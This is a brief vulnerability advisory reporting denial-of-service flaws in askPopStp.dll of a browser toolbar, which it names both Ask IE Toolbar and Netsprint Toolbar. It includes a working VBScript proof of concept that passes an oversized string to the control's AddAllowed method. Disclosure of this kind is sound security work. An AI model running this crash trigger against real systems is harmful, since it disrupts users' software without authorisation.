Synopsis: Multiple Ask IE Toolbar denial of service vulnerabilities
Product: Netsprint Toolbar
Version: 1.1

Author: Michal Bucko (sapheal)

Issue:

Multiple functions (in askPopStp.dll) suffer from improper
memory handling, which results in denial of service conditions.

Details:

Sample demonstration file (WSH script) is shown below.

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:89D30B4C-2408-4E78-A334-8FF8A9713EA7' id='target' />
<script language='vbscript'>

arg=String(4000, "A")

target.AddAllowed arg

</script></job></package>

Credits:

Michal Bucko (sapheal)

Disclaimer:

This document and all the information it contains are provided "as is",
for educational purposes only, without warranty of any kind, whether
express or implied.

The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in
this document. Liability claims regarding damage caused by the use of
any information provided, including any kind of information which is
incomplete or incorrect, will therefore be rejected.